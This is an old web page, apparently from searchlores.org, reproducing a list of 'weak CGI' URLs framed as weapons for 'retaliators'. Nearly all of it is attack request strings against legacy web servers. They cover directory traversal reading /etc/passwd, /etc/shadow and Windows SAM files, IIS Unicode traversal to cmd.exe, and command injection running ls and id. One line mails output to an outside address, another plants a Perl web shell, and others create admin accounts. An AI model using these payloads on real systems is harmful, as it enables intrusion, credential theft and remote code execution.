Rudi Carell's very powerful "weak CGIs" list (December 2000) Courtesy of www.searchlores.org The incorrect use of the CGI scripts implies many vulnerabilities for the system hosting them. Rudi Carell [you may contact Rudi @ rudicarellALT+64hotmail(point)com] has listed quite a lot of -ahem- interesting WEAK CGIs... a treasure-chest of interesting weapons for searchers and "retaliators" alike. /test.php3 /cgi-bin/test.php3 /cgi-bin/cgiemail/uargg.txt /cgi-bin/web2mail.cgi /random_banner/index.cgi?image_list=alternative_image.list&html_file=../../../../../etc/hosts /random_banner/index.cgi?image_list=alternative_image.list&html_file=|ls%20-la| /example.jsp../ /example%2ejsp /example.jsp.. /index.jsp.. /test.jsp.. /example.jsp%81 /index.JSP /index.jsp../ /test.jsp../ /index%2ejsp /test%2ejsp /index.JHTML /*.jhtml/ /*.jsp/ /ConsoleHelp/ /*.shtml/ /cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html= /cgi-bin/maillist.cgi?cmd=list&fldrname=inbox&fldnum=1&order=2&searchkey=&search_fldnum=0&page=99999&html= /cgi-bin/userreg.cgi?cmd=insert&lang=eng&tnum=3&fld1=test999%0als /..\..\..\winnt\repair\sam._ :80/../../../autoexec.bat /......autoexec.bat /.html/............/autoexec.bat /../../../../../../../boot.ini /....../ /..../ /inc/ /include/ /iisadmpwd/ /iissamples/ /scripts/iisadmin/ism.dll%3fhttp/dir /iisadmin/ism.dll%3fhttp/dir /cgi-bin/htimage.exe /_vti_bin/fpcount.exe /global.asa /global.asa+.htr /global.asa\ /default.asp+.htr /main.asp+.htr /_vti_bin/shtml.dll/tstt.htm /_vti_inf.html /_vti_log/author.log /_vti_pvt /_vti_bin/shtml.dll /_vti_bin/shtml.exe /_private/form_results.txt /secret/index.html /secret/index.htm /cgi-bin/phf /cgi-bin/commander.pl /cgi-bin/Count.cgi /cgi-bin/test.pl /cgi-bin/printenv /cgi-bin/test.cgi /cgi-bin/test-cgi /cgi-bin/nph-test-cgi /cgi-bin/php.cgi /cgi-bin/handler /cgi-bin/webgais /cgi-bin/websendmail /cgi-bin/webdist.cgi /cgi-bin/faxsurvey /cgi-bin/htmlscript /cgi-bin/pfdisplay /cgi-bin/perl.exe /cgi-bin/perl /perl /scripts/perl.exe /wwwboard/wwwboard.pl /cgi-bin/wwwboard.pl /wwwboard/wwwadmin.pl /cgi-bin/wwwadmin.pl /wwwboard/wwwadmin.cgi /cgi-bin/wwwadmin.cgi /cgi-bin/jj /cgi-bin/fi /cgi-bin/finger /cgi-bin/finger.cgi?action=archives&cmd=specific&&filename=99.10.28.15.23.username.|/bin/ls| /cgi-bin/wais.pl /cgi-bin/edit.pl /cgi-bin/textcounter.pl /cgi-bin/info2www /cgi-bin/cachemgr.cgi /cgi-bin/wguest.exe /scripts/wguest.exe /cgi-bin/test.exe /scripts/test.exe /cgi-bin/test.bat /scripts/test.bat /cgi-bin/www-sql /cgi-bin/search.cgi%3fletter= /cgi-bin/campas /cgi-bin/view-source /cgi-bin/webgais /cgi-bin/aglimpse /cgi-bin/wrap /cgi-bin/cgiwrap /cgi-bin/AnyForm2 /cgi-bin/infogate /search97/s97_cgi.exe /search97/search97.vts /cgi-bin/dumpenv.pl /session/adminlogin?RCpage=/sysadmin/index.stm /cgi-bin /cgi-shl /scripts /scripts/bdir.htr /scripts/convert.bas /scripts/files.pl /cgi-bin/files.pl /domcfg.nsf/%3fopen /domcfg.nsf/URLRedirect/%3fOpenForm /domcfg.nsf/viewname%3fSearchView&Query="*" /log.nsf /domlog.nsf /names.nsf /catalog.nsf /database.nsf?EditDocument /names.nsf/Open /cgi-bin/unlg1.1 /cgi-bin/man.sh /cgi-bin/AT-admin.cgi /cgi-bin/filemail.pl /cgi-bin/mailform.pl /cgi-bin/mailto.cgi /cgi-bin/mailform.cgi /cgi-bin/maillist.pl /cgi-bin/formto.pl /cgi-bin/bnbform.cgi /cgi-bin/bnbform.pl /cgi-bin/bnbform /cgi-bin/survey.cgi /htbin/postform?h_mailto=swoopme%40hotmail.com&h_reply-file=../../../../../../../etc/hosts /cgi-bin/postform?h_mailto=swoopme%40hotmail.com&h_reply-file=../../../../../../../etc/hosts /cgi-bin/postform?h_mailto=swoopme%40hotmail.com&h_reply-file=|ls| /cgi-bin/textcounter.pl /cgi-bin/classifieds.cgi /cgi-bin/environ.cgi /cgi-bin/environ.pl /cgi-dos/args.bat /cgi-bin/carbo.dll /cgi-bin/fpexplore.exe /cfdocs/expeval/exprcalc.cfm /cfdocs/expeval/sendmail.cfm /cfdocs/expeval/eval.cfm /cfdocs/expeval/openfile.cfm /cfdocs/expeval/displayopenedfile.cfm /cfdocs/exampleapp/email/getfile.cfm /cfdocs/examples/CVLibrary/GetFile.CFM?FT=Text&FST=Plain&FilePath=C:\boot.ini /cfdocs/exampleapp/publish/admin/addcontent.cfm /cfdocs/exampleapp/docs/sourcewindow.cfm?Template= /cfdocs/snippets/evaluate.cfm /cfdocs/snippets/fileexists.cfm /cfdocs/snippets/viewexample.cfm?Tagname= /cfdocs/cfmlsyntaxcheck.cfm /cfdocs/snippets/setlocale.cfm /cgi-bin/whois_raw.cgi /mall_log_files/order.log /PDG_Cart/shopper.conf /PDG_Cart/order.log /quikstore.cfg /orders/mountain.cfg /orders/orders.txt /Admin_files/order.log /cgi-bin/query%3f :9000/cgi-bin/query%3f /cgi-bin/admin.cgi /cgi-bin/ppdscgi.exe /ppwb/Temp/ :8010/c:// :8010/d:// :8010// :8010/..../ :8010/ :5000/ :2301 :3128/../../../../ :9090 :901 :8383 :800/../..\ :800/C:/ /adsamples/config/site.csc /iissamples/exair/howitworks/codebrws.asp /iissamples/sdk/asp/docs/codebrws.asp /AdvWorks/equipment/catalog_type.asp /scripts/repost.asp /SPSamp/AdvWorks/equipment/catalog_type.asp /cgi-bin/rwwwshell.pl /~root /cgi-bin/imagemap.exe /../../../../config.sys /cgi-bin/foo.cmd?xxx&dir /scripts/foo.cmd?xxx&dir /cgi-dos/foo.cmd?xxx&dir /cgi-bin/script.bat%3f&dir /scripts/script.cmd%3f&dir /scripts/script.bat%3f&dir /cgi-bin/tst.bat /cgi-bin/tst2.bat /cgi-bin/test.bat /cgi-bin/input.bat /cgi-bin/input2.bat /ssi/envout.bat /cgi-bin/get32.exe /cgi-bin/tst.bat /cgi-bin/alibaba.pl /cgi-bin/post32.exe /cgi-bin/post16.exe /cgi-bin/get16.exe /cgi-bin/lsin.exe /cgi-bin/lsindex2.bat /cgi-bin/imapcern.exe /cgi-bin/imapncsa.exe /cgi-bin/aliredir.exe :8080/../../../conf/Eserv.ini :3128/../../../conf/Eserv.ini :801/../../../../../../../../etc/hosts :8888/ :9998/ /publisher/ /bigconf.cgi /cgi-bin/bigconf.cgi /scripts/bigconf.cgi /cgi-bin/ftpdiag.cgi /cgi-bin/formhandler.cgi /cgi-bin/add_ftp.cgi /cgi-bin/OrderForm.cgi /cgi-bin/cgitest.exe /cgi-bin/flexform.cgi /ows-bin/owa/owa%5futil%2esignature /ows-bin/owa/owa%5futil%2eshowsource /ows-bin/perlidlc.bat?&dir /ows-bin/*.bat?&dir :8003/Display /cgi-bin/whois.cgi /minivend/catalog.cfg /cgi-bin/simple /cgi-bin/simple/config/menu /cgi-bin/simple/config/seefile.html?mv_arg=catalog%2ecfg /cgi-bin/simple/view_page.html?mv_arg=|/bin/ls| /search%3f /suche%3f /search/iaquery.exe%3f /cgi-bin/GW5/GWWEB.EXE?HELP=bad-request /cgi-bin/GW5/GWWEB.EXE?HELP=../../../../../index /cgi-bin/webwho.pl /cgi-bin/w3-msql/index.html /cgi-bin/FormMail.pl /cgi-bin/formmail.pl /msadc/msadcs.dll /msadc/samples/adctest.asp /scripts/tools/getdrvrs.exe /scripts/tools/newdsn.exe%3fdriver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=Web%20SQL&dbq=c:\web.mdb&newdb=CREATE_DB&attr= /scripts/samples/ctguestb.idc /scripts/samples/details.idc /cgi-bin/forum.pl /cgi-bin/forum-admin.pl /cgi-bin/sendmail.cgi /cgi-bin/guestadd.pl /cgi-bin/plusmail /manage/cgi/cgiproc?Nocfile= /iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=&CiRestriction=none&CiHiliteType=Full /iissamples/issamples/oop/qsumrhit.htw /iissamples/exair/search/qfullhit.htw /iissamples/exair/search/qsumrhit.htw /null.htw?CiWebHitsFile=/global.asa%20&CiRestriction=none&CiHiliteType=Full /iishelp/iis/misc/iirturnh.htw /cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi /cgi-bin/wwwthreads/changedisplay.pl /scripts/wsisa.dll/WService=anything?WSMadmin /cgi-bin/Ultimate.cgi /cgi-bin/forumdisplay.cgi /ubb/cgi-bin/postings.cgi /cgi-bin/postings.cgi /cgi-bin/core /.htaccess /.htpasswd /cgi-bin/echo.bat /cgi-bin/hello.bat /cgi-bin/htsearch?exclude=%60%60 /cgibin/htgrep/file=index.html&hdr=/etc/hosts /cgi-bin/loadpage.cgi /cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id /cgi-bin/rmp_query /cgi-bin/postcard.pl /cgi-bin/.fhp /cgi-bin/clickresponder.pl /cgi-win/uploader.exe /cgi-bin/uploadn.asp /cgi-bin/excite /cgi-bin/sojourn.cgi?cat=ng%00 /cgi-bin/abuse.man?file=&domain=&script= /jsp/source.jsp /cgi-bin/dfire.cgi /cd/../config/html/cnf_gi.htm /cgi-bin/bb-hist.sh?HISTFILE=../../../../../../etc/hosts /ccbill/ /cgi-bin/windmail.exe?-n%20c:\boot.ini%20swoopme@@hotmail.com /cgi-bin/windmail.exe?%20|%20dir%20c:\ /cgi-bin/dcforum/install_help.cgi /doc/ /scripts/slxweb.dll/admin /cgi-bin/getdoc.cgi /cgi-bin/webplus?script= /cgi-bin/scripts/cart.pl /cgi-bin/scripts/cart.pl?vars /cgi-bin/scripts/cart.pl?env /cgi-bin/scripts/cart.pl?db|cart.pl|All%20Items /cgi-bin/bizdb1-search.cgi?template=bizdb-summary&dbname=;ls|mail%20swoopme@@hotmail.com|&f6=^a.*&action=searchdbdisplay /_vti_bin/_vti_aut/dvwssr.dll /_vti_bin/_vti_aut/mtd2lv.dll /piranha/secure/passwd.php3?username=piranha&passwd=q /cgi-bin/UltraBoard/UltraBoard.pl?Action=PrintableTopic&Post=../../UBData/Members/members.grp%00&Board=6210&Idle=10&Sort=0&Order=Descend&Page=0&Session= /cgi-bin/UltraBoard/UltraBoard.cgi?Action=PrintableTopic&Post=../../UBData/Members/members.grp%00&Board=6210&Idle=10&Sort=0&Order=Descend&Page=0&Session= /scripts/cart32.exe/cart32clientlist?passwd=wemilo /scripts/c32web.exe/ChangeAdminPassword /cgi-bin/cart32.exe/expdate /scripts/dbman/db.cgi?db=tedb /scripts/process_bug.cgi /cgi-bin/process_bug.cgi /cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id /scripts/emurl/RECMAN.dll? /cgi-bin/allmanage.pl /cgi-bin/allmanage.cgi /cgi-bin/calender.pl /cgi-bin/calender_admin.pl /cgi-bin/ads.cgi /cgi-bin/admin.cgi /ads/admin.cgi /cgi-bin/adpassword.txt /ads/adpassword.txt /cgi-bin/infosrch.cgi /scripts/Carello/add.exe :8000/cgi/wja?page=wja /robots.txt /file/index.jsp /file/main.jsp /file/main.shtml /file/index.shtml /file/main.jhtml /file/index.jhtml /cgi-bin/showfile /servlet/SessionServlet /servlet/viewsource.jsp /viewsource.jsp :8987/sawmill?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3 /cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1 /cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/hosts%00 /cgi-bin/pollit/Poll_It_v2.0.cgi?data_dir=/etc/hosts%00 /site/eg/source.asp /eg/source.asp /cgi-bin/source.asp /cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/hosts /cgi-bin/msn.cgi /cgi-bin/disk2server.cgi /cgi-bin/upload.cgi /.www.my.cnf /cgi-bin/.www.my.cnf /cgi-bin/futureforum.cgi /examples/applications/bboard/bboard_frames.html /admin-serv/config/admpw /https-admserv/config/admpw /cgi-bin/cookmail /cgi-bin/cookmail/cookmail /cgi-bin/cookmail/cookmail.exe /cgi-bin/ftp/ftp.pl?dir=../../../../../../etc /active.log /cgi/cvsweb.cgi /cgi-bin/cvsweb.cgi :8010/Guide/../../../../../../../../../../../../../../../etc/shadow :8010/Guide/../../../../../../../../../../../var/CommuniGate/Accounts/postmaster.macnt/account.settings /bin/common/user_update_admin.pl /bin/common/user_update_passwd.pl?user_id=V&firstname=FI&lastname=LA&course_id=SID&password1=NEWPWD&password2=NEWPWD /cgi-bin/ssi//../../../../../../../../../etc/hosts :8080/examples/jsp/snp/anything.snp :8080/anything.jsp /anything.jsp /examples/jsp/snp/anything.snp /pservlet.html /cgi-bin/[email protected]&text=tst&EmailForm=/cgi-bin/mailto /cgi-bin/[email protected]&FileName=mailfile:[email protected] /cgi-bin/[email protected]&filename=mailfile.cgi /cgi-bin/[email protected][email protected]&Message=tst&MailTemplate1=/cgi-bin/formprocessor.asp /cgi-bin/af.cgi /%00/ /admin/ :8080/tea/dynamic/system/teaservlet/Admin?admin=true /servlet/file /%2E%2E/%2E%2E/Program%20Files/AnalogX/SimpleServer/www/server.log /servlet/test/pathInfo/test /..../ /~nobody/etc/ :3000/../../hosts :444/..\..\..\..\..\autoexec.bat /pccsmysqladm/incs/dbconnect.inc /include/dbconfig.inc :8888/ab2/@Ab2Admin :8888/cgi-bin/admin/admin :8888/cgi-bin/admin/admin?command=add_user&uid=percebe&password=percebe&re_password=percebe /cgi-bin/netauth.cgi?cmd=show&page=../../ /admin.php3?admin=whatever :9090/board.html :9090/examples/applications/bboard/bboard_frames.html :9090/servlet/com.sun.server.http.pagecompile.jsp92.JspServlet/board.html /cgibin/amadmin.pl?setpasswd /cgi-bin/awl/auctionweaver.pl?flag1=1&catdir=\..\..\..\..\..\..\..\..\&fromfile=Boot.ini /cgi-bin/news/news.cgi?addAuthor /cgi-bin/awl/auctionweaver.pl /cgi-bin/CGImail.exe /.photon/voyager/config.full /cgi-bin/cpmdaemon.cgi :8088 /products/phpPhotoAlbum/explorer.php?folder=../../../../../../../etc/ /phpPhotoAlbum/getalbum.php?album=../../../etc/ /cgi-bin-sdb/ /cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../etc/hosts%00 /siteman000510/siteman.php3 /cgi-bin/multihtml.pl?multi=/etc/hosts%00html /search.dll?search?query=%00&logic=AND m/search.dll?search?query=/&logic=AND :8002/Newuser?Image=../../database/rbsserv.mdb /doc/packages/ /cp/rac/nsManager.cgi?Domain=nothing.org&IP=127.0.0.1&OP=add&Language=english&Submit=Confirm /_private/shopping_cart.mdb /cgi-bin/webdata_test.pl /cgi-bin/cached_feed.cgi?../../../.+/etc/hosts /cgi-bin/ssi/cgi-bin/ssi /cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts /Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0 /cgi-bin/shop.cgi/page=../../../../etc/hosts /cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../etc /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%d1%9c../winnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%d0%af../winnt/system32/cmd.exe?/c+dir+c:\ /cgi-bin/shopper.cgi?newpage=../../../../../../../../../etc/hosts /cgi-bin/Web_Store/web_store.cgi?page=%00 /cgi-bin/phpinfo.php /cgi-bin/phpinfo.php3 :8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../test.jsp :8000/servlet/ssifilter/../../test.jsp :8000/servlet/com.livesoftware.jrun.plugins.jsp.JSP/../../../tst.txt :8000/servlet/jsp/../../tst.txt :8100//WEB-INF/ :8100//WEB-INF/web.xml :8100//WEB-INF/webapp.properties /c/s.dll/pagelog.cgi?display=../../../../tmp/a /cgi-bin/pagelog.cgi?name=../../../../../tmp/blah /cgi-bin/gbook.cgi?_MAILTO=xx;ls /cgi-bin/search.pl /admin/includes/ /cgi-bin/bb-hist.sh?HISTFILE=/home/* /cgi-bin/bb-histlog.sh /cgi-bin/bb-hostsvc.sh /cgi-bin/bb-rep.sh /cgi-bin/bb-replog.sh /cgi-bin/bb-ack.sh /cgi-bin/cgiforum.pl?thesection=../../../../../../etc/hosts%00 /cgi-bin/cgiforum.cgi?thesection=../../../../../../etc/hosts%00 /cgi-bin/build.cgi /build.cgi /forums/list.php /cgi-bin/html_page?TEMPLATE=main /index.php3?vhosts=http://go.to /cgi-bin/db2www/library/document.d2w/report?uid=UNKNOWN&pwd=&search_type=SIMPLE&r_host=&last_page=db2www0022.html&fn=db2www.html /+/ /./ /+./ /++/ /++./ /includes/global.inc /2600-cgi/ezmlm-cgi /cgi-bin/ezmlm-cgi /mmstdod.cgi?ALTERNATE_TEMPLATES=|%20echo%20"Content-Type:%20text%2Fhtml"%3Becho%20""%20%3B%20id%00 /."./."./Perl/eg/core/findtar /."./."./Perl/eg/core/findtar+&+echo+system(@ARGV);+>+c:\InetPub\wwwroot\cmd.pl+&+.pl /."./."./winnt/reapir/sam._%20.pl /cgi-bin/ad.cgi?file=../../../../../../../../etc/hosts /ad.cgi?file=../../../../../../../../etc/hosts /subscribe.pl /cgi-bin/simplestmail.cgi?redirect=www.ibm.com&MyEmail=swoopme@hotmail.com;ls%20-alsi&submit=run /everythingform.cgi?config=../../../../../../../../bin/[email protected] /cgi-bin/everythingform.cgi?config=../../../../../../../../bin/[email protected] /cgi-bin/dcguest.cgi /cgi-bin/dcguest/dcguest.cgi /guestbook/dcguest.cgi /index.php3.%5c../..%5cconf/httpd.conf /phpgroupware/inc/phpgwapi/phpgw.inc.php /submit.phpGood luck, good hunt! Back to ideale |